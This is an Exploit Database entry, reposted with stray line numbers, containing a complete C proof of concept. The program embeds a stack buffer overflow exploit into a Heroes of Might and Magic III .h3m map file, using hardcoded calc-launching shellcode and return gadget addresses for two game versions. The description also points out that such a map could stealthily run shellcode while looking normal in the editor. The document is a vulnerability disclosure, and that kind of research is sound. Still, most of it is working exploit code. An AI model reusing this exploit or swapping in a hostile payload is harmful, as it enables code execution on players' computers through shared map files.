Heroes of Might and Magic III – Map Parsing Arbitrary Code Execution

Exploit Database
139 阅读

作者： John AAkerblom

日期： 2015-07-29
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/37716/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

# Exploit Title : Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution

# Date : 2015-07-29

# Exploit Author : John AAkerblom, Pierre Lindblad

# Website: http://h3minternals.net

# Vendor Homepage : 3do.com (defunct), https://sites.google.com/site/heroes3hd/

# Version : 4.0.0.0 AND HoMM 3 HD 3.808 build 9

# Tested on : Windows XP, Windows 8.1

# Category: exploits

# Description:

This PoC embeds an exploit into an uncompressed map file (.h3m) for Heroes

of Might and Magic III. Once the map is started in-game, a buffer overflow

occuring when loading object sprite names leads to shellcode execution.

Only basic arbitrary code execution is covered in this PoC but is possible to

craft an exploit that lets the game continue normally after the shellcode has

been executed. Using extensive knowledge of the .h3m format, it is even

possible to create a map file that loads like normal in the game's map editor

(which lacks the vulnerability) but stealthily executes shellcode when opened

in-game.

#include <string.h>

#include <stdint.h>

#include <stdio.h>

#include <stdlib.h>

/* Calc payload: https://code.google.com/p/win-exec-calc-shellcode/

0xEBFE added at end. Note that a NULL-less payload is not actually needed

and Peter Ferrie <peter.ferrie@gmail.com>

Redistribution and use in source and binary forms, with or without

modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright

notice, this list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright

notice, this list of conditions and the following disclaimer in the

documentation and/or other materials provided with the distribution.

* Neither the name of the copyright holder nor the names of the

contributors may be used to endorse or promote products derived from

this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,

INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY

AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE

INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT

NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,

DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY

THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT

(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS

SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */

static const uint8_t CALC_PAYLOAD[] = {

0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x52,

0x51, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C,

0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C,

0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x54, 0x1F,

0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07,

0x57, 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F, 0x1C, 0x01,

0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0xEB, 0xFE

};

* The memmem() function finds the start of the first occurrence of the

* substring 'needle' of length 'nlen' in the memory area 'haystack' of

* length 'hlen'.

* The return value is a pointer to the beginning of the sub-string, or

* NULL if the substring is not found.

* Original author: caf, http://stackoverflow.com/a/2188951

static uint8_t *_memmem(uint8_t *haystack, size_t hlen, uint8_t *needle, size_t nlen)

{

uint8_t needle_first;

uint8_t *p = haystack;

size_t plen = hlen;

if (!nlen)

return NULL;

needle_first = *(uint8_t*)needle;

while (plen >= nlen && (p = memchr(p, needle_first, plen - nlen + 1)))

{

if (!memcmp(p, needle, nlen))

return p;

p++;

plen = hlen - (p - haystack);

}

return NULL;

}

#ifdef _MSC_VER

#pragma warning(disable:4996) // M$ fopen so unsafe

#endif

#pragma pack(push, 1)

// exploit struct

// .h3m files contain an array of object attributes - OA - in which each

// entry starts with a string length and then a string for an object sprite.

// This exploit overflows the stack with a malicious sprite name.

struct exploit_oa_t

{

uint32_t size; // size of the rest of this struct, including shellcode

// The rest of the struct is the sprite name for the OA, <size> bytes of

// which an CALL ESP-gadget address is placed so that it overwrites the

// return address, when ESP is called shellcode2 will be executed. An

// additional 2 "anticrash" gadgets are needed so the game does not crash

// before returning to the CALL ESP-gadget.

uint8_t nullbyte; // Must be 0x00, terminating sprite name

uint8_t overwritten[6]; // Overwritten by game

uint8_t shellcode1[121]; // Mostly not used, some is overwritten

uint32_t call_esp_gadget; // Address of CALL [ESP], for saved eip on stack

// anticrash_gadget1, needs to pass the following code down to final JMP:

// MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]

// XOR EBX, EBX

// CMP EAX, EBX

// JE SHORT <crash spot> ; JMP to crash if EAX is 0

// MOV CL, BYTE PTR DS : [EAX - 1]

// CMP CL, BL

// JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0

// CMP CL, 0FF

// JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF

// CPU Disasm

// CMP EDI, EBX

// JNE <good spot> ; JMP to good spot. Always occurs if we get this far

uint32_t anticrash_gadget1;

// anticrash_gadget2, needs to return out of the following call (tricky):

// MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]

// CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]

uint32_t anticrash_gadget2;

// Here at 144 bytes into this struct comes the shellcode that will be

// executed. For the game to survive, it is wise to use this only for a

// short jmp as doing so means only 2 values have to be restored on the

// stack. Namely: original return address and format value of the h3m.

// This PoC simply puts shellcode here, meaning the game cannot continue

// after shellcode execution.

uint8_t shellcode2[];

};

struct offsets_t

{

uint32_t call_esp_gadget;

uint32_t anticrash_gadget1;

uint32_t anticrash_gadget2;

};

#pragma pack(pop)

static const struct offsets_t * const TARGET_OFFSETS[] = {

(struct offsets_t *)"\x87\xFF\x4E\x00\xD4\x97\x44\x00\x30\x64\x6A\x00",

(struct offsets_t *)"\x0F\x0C\x58\x00\x48\x6A\x45\x00\x30\x68\x6A\x00"

};

#define TARGET_DESCS "1: H3 Complete 4.0.0.0[Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]\n" \

"2: HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]"

#define MAX_TARGET 2

// Name of a sprite present in all maps, this is overwritten with exploit

#define NEEDLE "AVWmrnd0.def"

int pack_h3m(FILE *h3m_f, const struct offsets_t * const ofs, const uint8_t *payload, long payload_size)

{

uint8_t *buf = NULL;

uint8_t *p = NULL;

long h3m_size = 0;

long bytes = 0;

struct exploit_oa_t *exp = NULL;

// Read entire h3m file into memory

fseek(h3m_f, 0, SEEK_END);

h3m_size = ftell(h3m_f);

rewind(h3m_f);

buf = malloc(h3m_size);

if (buf == NULL) {

puts("[!] Failed to allocate memory");

return 1;

}

bytes = fread(buf, sizeof(uint8_t), h3m_size, h3m_f);

if (bytes != h3m_size) {

free(buf);

puts("[!] Failed to read all bytes");

return 1;

}

// Find game object array in .h3m, where we will overwrite the first entry

p = _memmem(buf, h3m_size, (uint8_t *)NEEDLE, sizeof(NEEDLE) - 1);

if (p == NULL) {

puts("[!] Failed to find needle \"" NEEDLE "\" in file. Make sure it is an uncompressed .h3m");

free(buf);

return 1;

}

// Move back 4 bytes from sprite name, pointing to the size of the sprite name

p -= 4;

// Overwrite the first game object with exploit

exp = (struct exploit_oa_t *)p;

exp->size = sizeof(*exp) - sizeof(exp->size) + payload_size;

exp->nullbyte = 0;

exp->call_esp_gadget = ofs->call_esp_gadget;

exp->anticrash_gadget1 = ofs->anticrash_gadget1;

exp->anticrash_gadget2 = ofs->anticrash_gadget2;

memcpy(exp->shellcode2, payload, payload_size);

// Write entire file from memory and cleanup

rewind(h3m_f);

bytes = fwrite(buf, sizeof(uint8_t), h3m_size, h3m_f);

if (bytes != h3m_size) {

free(buf);

puts("[!] Failed to write all bytes");

return 1;

}

free(buf);

return 0;

}

static void _print_usage(void)

{

puts("Usage: h3mpacker <uncompressed h3m filename> <target #>");

puts("Available targets:");

puts(TARGET_DESCS);

puts("Examples:");

puts("h3mpacker Arrogance.h3m 1");

puts("h3mpacker Deluge.h3m 2");

}

int main(int argc, char **argv)

{

FILE *h3m_f = NULL;

int ret = 0;

int target;

if (argc != 3) {

_print_usage();

return 1;

}

h3m_f = fopen(argv[1], "rb+");

target = strtoul(argv[2], NULL, 0);

if (h3m_f == NULL || target < 1 || target > MAX_TARGET) {

if (h3m_f != NULL)

fclose(h3m_f);

_print_usage();

return 1;

}

ret = pack_h3m(h3m_f, TARGET_OFFSETS[target-1], CALC_PAYLOAD, sizeof(CALC_PAYLOAD));

fclose(h3m_f);

if (ret != 0)

return ret;

printf("[+] Payload embedded into h3m file %s\n", argv[1]);

return 0;

}